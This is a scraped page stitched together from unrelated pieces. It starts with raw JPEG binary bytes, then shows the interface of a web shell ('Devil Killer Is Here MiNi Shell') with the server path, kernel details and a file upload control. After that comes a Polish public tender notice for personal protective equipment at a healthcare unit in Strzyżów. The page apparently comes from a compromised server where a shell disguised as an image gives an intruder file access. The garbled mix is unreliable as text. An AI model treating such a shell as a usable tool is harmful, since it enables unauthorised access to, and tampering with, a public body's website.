JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220419/0012568101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa środków ochrony indywidualnej z podziałem na pakiety </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Opieki Zdrowotnej w Strzyżowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370482512</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbrowskiego</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzyżów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 27 61 201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 27 61 264</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zozstrzyzow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozstrzyzow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa środków ochrony indywidualnej z podziałem na pakiety </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3fbcf590-bb18-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00125681</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00069997/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Środki ochrony indywidualnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej:przetargi.as@zozstrzyzow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały<br/>opisane w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Oferta powinna<br/>być sporządzona w języku polskim z zachowaniem postaci elektronicznej w szczególności w formacie<br/>danych .pdf, .doc, .odt, ..docx i musi być podpisana kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym przez osobę/osoby uprawnioną/uprawnione pod<br/>rygoremnieważności. Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Regulaminie<br/>korzystania z miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja w zakresie art. 13 RODO związana z<br/>postępowaniem o udzielenie zamówienia publicznego: W związku z rozpoczęciem stosowania z<br/>dniem25 maja 2018 r. Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych, dalej: RODO) informujemy, iż na podstawie art. 13 RODO od dnia<br/>25 maja 2018 r. będą Pani/Panu przysługiwały określone poniżej prawa związane z przetwarzaniem<br/>Pani/Pana danych osobowych przez Zespół Opieki Zdrowotnej w Strzyżowie (dalej: ZOZ Strzyżów).<br/>Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>Administratorem Pani/Pana danych osobowych jest Dyrektor Zespołu Opieki Zdrowotnej w Strzyżowie<br/>z siedzibą przy ul. Dąbrowskiego 10, 38-100 Strzyżów (nr tel. +48 17 27 61 201, adres<br/>email: sekretariat@zozstrzyżów.pl). W ZOZ Strzyżów wyznaczony został Inspektor Ochrony Danych, z<br/>którym można skontaktować się drogą elektroniczną pod adresem e-mail:<br/>iod@zozstrzyzow.pl.Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. a<br/>RODO w następujących celach:<br/>•postępowania o udzielenie zamówienia publicznego nr: ZP.26.16.2022<br/>• realizacji zamówienia przez Wykonawcę. W związku z przetwarzaniem danych w celach wskazanych<br/>w pkt 19.11.4, Pani/Pana dane osobowe mogą być udostępniane innym odbiorcom lub kategoriom<br/>odbiorców danych osobowych. Odbiorcami Pani/Pana danych osobowych mogą być tylko podmioty<br/>uprawnione do odbioru Pani/Pana danych, w tym państwa trzecie, w uzasadnionych przypadkach i na<br/>podstawie odpowiednich przepisów prawa. Pani/Pana dane osobowe będą przetwarzane na podstawie<br/>przepisów prawa, przez okres niezbędny do realizacji celów przetwarzania<br/>wskazanych w pkt , lecz nie krócej niż okres wskazany w przepisach o archiwizacji. Podanie danych<br/>jest dobrowolne, ale konieczne w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego oraz realizacji zamówienia, w której Pani/Pan będzie brał/a udział. W związku z<br/>przetwarzaniem przez ZOZ Strzyżów, Pani/Pana danych osobowych, przysługuje Pani/Panu prawo do:<br/>• dostępu do treści danych, na podstawie art. 15 RODO z zastrzeżeniem, że udostępniane dane<br/>osobowe nie mogą ujawniać informacji niejawnych, ani naruszać tajemnic prawnie chronionych, do<br/>których zachowania zobowiązany jest Dyrektor ZOZ Strzyżów;<br/>• sprostowania danych, na podstawie art. 16 RODO;<br/>• ograniczenia przetwarzania danych, na podstawie art. 18 RODO;W przypadku uznania, iż<br/>przetwarzanie przez ZOZ Strzyżów Pani/Pana danych osobowych narusza przepisy RODO,<br/>przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego, o którym mowa w art. 51<br/>RODO. Udostępnione dane nie będą podlegały profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.26.16.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 1. Rękawice ortopedyczne pudrowane jałowe w asortymencie i ilości podanych w załączniku nr 1 -<br/>formularzu cenowym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141420-0 - Rękawice chirurgiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zakupu mniejszej ilości przedmiotu zamówienia do 60 %<br/>łącznej wartości przedmiotu zamówienia niż podana w Formularzu cenowo - ofertowym, w<br/>przypadku wystąpienia sytuacji trudnej do przewidzenia w chwili zawarcia umowy tj. w<br/>przypadku braku zapotrzebowania na przedmioty zamówienia objęte niniejszą umową z uwagi<br/>na ilość pacjentów leczonych na oddziałach Zamawiającego. W takim przypadku Wykonawca<br/>może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy, bez<br/>naliczania jakichkolwiek kar. Zamawiający działa w najlepszej wierze zrealizowania zamówienia<br/>w całości.<br/>Strony umowy zgodnie uznają, że ilości przedmiotu zamówienia wskazane w formularzu<br/>asortymentowo-cenowym są ilościami szacunkowymi i dostarczane będą sukcesywnie na<br/>zlecenie Zamawiającego, w zależności od jego potrzeb, w okresie trwania umowy. Zamawiający<br/>zastrzega sobie możliwość przesunięcia ilościowego pomiędzy poszczególnymi pozycjami<br/>formularza asortymentowo – cenowego, stanowiącego załącznik nr 1 do umowy, przy<br/>zachowaniu maksymalnej wartości przedmiotu zamówienia <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> II kwartał 2023 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie<br/>(Kryterium nr 1 + Kryterium nr 2) najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy częściowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 2. Maska chirurgiczna na troki w asortymencie i ilości podanych w załączniku nr 1 -<br/>formularzu cenowym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zakupu mniejszej ilości przedmiotu zamówienia do 60 %<br/>łącznej wartości przedmiotu zamówienia niż podana w Formularzu cenowo - ofertowym, w<br/>przypadku wystąpienia sytuacji trudnej do przewidzenia w chwili zawarcia umowy tj. w<br/>przypadku braku zapotrzebowania na przedmioty zamówienia objęte niniejszą umową z uwagi<br/>na ilość pacjentów leczonych na oddziałach Zamawiającego. W takim przypadku Wykonawca<br/>może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy, bez<br/>naliczania jakichkolwiek kar. Zamawiający działa w najlepszej wierze zrealizowania zamówienia<br/>w całości.<br/>Strony umowy zgodnie uznają, że ilości przedmiotu zamówienia wskazane w formularzu<br/>asortymentowo-cenowym są ilościami szacunkowymi i dostarczane będą sukcesywnie na<br/>zlecenie Zamawiającego, w zależności od jego potrzeb, w okresie trwania umowy. Zamawiający<br/>zastrzega sobie możliwość przesunięcia ilościowego pomiędzy poszczególnymi pozycjami<br/>formularza asortymentowo – cenowego, stanowiącego załącznik nr 1 do umowy, przy<br/>zachowaniu maksymalnej wartości przedmiotu zamówienia <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> II kwartał 2023 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie<br/>(Kryterium nr 1 + Kryterium nr 2) najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy częściowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 3. Odzież jednorazowego użytku w asortymencie i ilości podanych w<br/>załączniku nr 1 - formularzu cenowym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zakupu mniejszej ilości przedmiotu zamówienia do 60 %<br/>łącznej wartości przedmiotu zamówienia niż podana w Formularzu cenowo - ofertowym, w<br/>przypadku wystąpienia sytuacji trudnej do przewidzenia w chwili zawarcia umowy tj. w<br/>przypadku braku zapotrzebowania na przedmioty zamówienia objęte niniejszą umową z uwagi<br/>na ilość pacjentów leczonych na oddziałach Zamawiającego. W takim przypadku Wykonawca<br/>może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy, bez<br/>naliczania jakichkolwiek kar. Zamawiający działa w najlepszej wierze zrealizowania zamówienia<br/>w całości.<br/>5Strony umowy zgodnie uznają, że ilości przedmiotu zamówienia wskazane w formularzu<br/>asortymentowo-cenowym są ilościami szacunkowymi i dostarczane będą sukcesywnie na<br/>zlecenie Zamawiającego, w zależności od jego potrzeb, w okresie trwania umowy. Zamawiający<br/>zastrzega sobie możliwość przesunięcia ilościowego pomiędzy poszczególnymi pozycjami<br/>formularza asortymentowo – cenowego, stanowiącego załącznik nr 1 do umowy, przy<br/>zachowaniu maksymalnej wartości przedmiotu zamówienia <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> II kwartał 2023 <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie<br/>(Kryterium nr 1 + Kryterium nr 2) najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy częściowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">(a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej oraz<br/>Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>aktualności oświadczenia złożonego w załączniku nr 3 – wzór oświadczenia stanowi załącznik nr 4 do<br/>SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Pakiet 1. Rękawice ortopedyczne pudrowane jałowe<br/>Przedmiotowe środki dowodowe potwierdzające:<br/>a) grubość dłoń, palec, mankiet,<br/>b) AQL<br/>c) średnia siła zrywu przed starzeniem<br/><br/>Pakiet 2. Maska chirurgiczna na troki<br/>Przedmiotowe środki dowodowe potwierdzające:<br/>a) ilość i grubość warstw<br/>b) poziom filtracji bakterii BFE<br/>c) czystość mikrobiologiczna <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jak wyżej wymienione <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo (o ile dotyczy), Uzasadnienie zastrzeżenia informacji w ofercie (o ile dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) 